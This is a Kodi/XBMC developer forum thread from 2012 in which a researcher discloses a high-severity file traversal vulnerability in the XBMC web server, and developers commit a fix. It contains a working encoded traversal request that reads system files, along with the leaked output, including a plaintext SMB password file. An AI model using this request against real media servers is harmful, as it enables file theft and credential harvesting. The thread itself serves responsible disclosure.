Security issues in XBMC - Printable Version +- Kodi Community Forum (https://forum.kodi.tv) +-- Forum: Development (https://forum.kodi.tv/forumdisplay.php?fid=32) +--- Forum: Kodi Application (https://forum.kodi.tv/forumdisplay.php?fid=93) +--- Thread: Security issues in XBMC (/showthread.php?tid=144110) |
Security issues in XBMC - acidgen - 2012-10-31 Got several high risk security issues in XBMC, would like to come in contact with a main developer or someone in charge of XBMC security. Thanks Best Regards Lucas RE: Security issues in XBMC - Martijn - 2012-10-31 just post what you found so they can look at it RE: Security issues in XBMC - acidgen - 2012-10-31 (2012-10-31, 21:58)Martijn Wrote: just post what you found so they can look at it By posting what I found I'd expose thousands of users running XBMC, perhaps 3'rd party to such as openelec etc.... Are you sure that is what you want? Br, Lucas RE: Security issues in XBMC - davilla - 2012-10-31 any xbmc users that has xbmc directly exposed on the net is a fool RE: Security issues in XBMC - acidgen - 2012-10-31 (2012-10-31, 22:01)davilla Wrote: any xbmc users that has xbmc directly exposed on the net is a fool Alright... that's .. professionally said.... I'll coordinate a disclosure with the firm I work for, and post the vulnerabilities I have. Usually takes about a day, since most vendors wan't to keep it under the lid until they have a patch. Do you wan't them here, or in the bug tracker? Best regards Lucas RE: Security issues in XBMC - theuni - 2012-10-31 Any vulnerability will be fixed with a public commit. We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release. If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly.. so i'm not sure what "serious enough" would be. RE: Security issues in XBMC - acidgen - 2012-10-31 (2012-10-31, 22:14)theuni Wrote: Any vulnerability will be fixed with a public commit. True story, not here to argue, your call. There's a lot of things that shouldn't be exposed, that are exposed. And yes this dates back and effects Eden as well. I'll post it tomorrow. Best regards Lucas RE: Security issues in XBMC - acidgen - 2012-11-02 Seems like this is going to take a couple of extra days, documents etc need to go through review for the coordinated disclosure. Thanks for baring with me. Best regards Lucas RE: Security issues in XBMC - jmarshall - 2012-11-02 Quote:Thanks for baring with me. I guess I can see how a security issue might be likened to being naked... RE: Security issues in XBMC - acidgen - 2012-11-04 You can find the full disclosure at http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf Below is a summary of the File Traversal vulnerability, which allows an attacker to read any file on the system, with the same privileges as the XBMC process. Since XBMC stores usernames and password in clear text, an attacker might be able to gain further access to the targeted machine with the found credentials. File traversal vulnerability can be triggered with (Windows request) : http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini ---SNIP--- XBMC File traversal vulnerability Severity: High Affected: XBMC 11 => Nightly build 20121028 Windows version XBMCbuntu / XBMC 11 for Linux XBMC 11 11.0 for Respberry Pi XBMC 11.0 Git:20120702-f3cd288 for Jailbroken AppleTV 2 version (Thanks to Matt "hostess" Andreko for the verification.) Impact Remote File traversal allows an attacker to read any file on the targeted system with the same privileges as XBMC. Since XBMC stores SMB and other credentials in clear text on the computer running the service, an attacker could easily find valid network credentials to gain further access. This could lead to full system compromise, or compromise other systems XBMC has access to. Request (Windows): http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini Output: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail]Confidential. Proprietary. [5] MAPI=1 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo asx=MPEGVideo au=MPEGVideo m1v=MPEGVideo m3u=MPEGVideo mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wmx=MPEGVideo wpl=MPEGVideo wvx=MPEGVideo XBMC Password file (which is unencrypted): /private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml <passwords> <path> <from pathversion="1">smb://192.168.1.2/Movies</from> <to pathversion="1">smb://someuser[email protected]/Movies/</to> </path> <path> <from pathversion="1">smb://192.168.1.2/tv</from> <to pathversion="1">smb://someuser2[email protected]/tv/</to> </path> <path> <from pathversion="1">smb://192.168.1.2/Music</from>Confidential. Proprietary. [4] <to pathversion="1">smb://someuser3[email protected]/Music/</to> </path> </passwords> ---SNIP--- Best regards Lucas RE: Security issues in XBMC - Tolriq - 2012-11-04 This was known for a very very long time And is corrected in lasts Frodo nightly with added security on vfs handler. When I first reported this the official answer was don't put your Xbmc on Internet it's not secure Check : http://forum.xbmc.org/showthread.php?tid=81173 RE: Security issues in XBMC - Montellese - 2012-11-04 It's the same vulnerability but in a different spot. I'll look into it. RE: Security issues in XBMC - Montellese - 2012-11-04 Should be fixed with https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335. See how easy it is if you just post your findings here? PS: You mentioned "serveral high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us? RE: Security issues in XBMC - amet - 2012-11-04 But then there would be no official document and no drama RE: Security issues in XBMC - acidgen - 2012-11-04 (2012-11-04, 13:56)Tolriq Wrote: This was known for a very very long time The nightly was still vulnerable last time i checked. And if it has been known for a while, perhaps it's time to fix it? Best regards Lucas (2012-11-04, 15:45)amet Wrote: But then there would be no official document and no drama You can also say, no official document, nothing gets done. Best regards Lucas (2012-11-04, 15:21)Montellese Wrote: Should be fixed with https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335. See how easy it is if you just post your findings here? Nice, way faster then most Yeah Currently investigation if it's exploitable or not. At least a DoS. If it's just a DoS I'll post it in the bug forums. There's two possible issues that are in the 'works'. You'll know when i know. Best regards Lucas |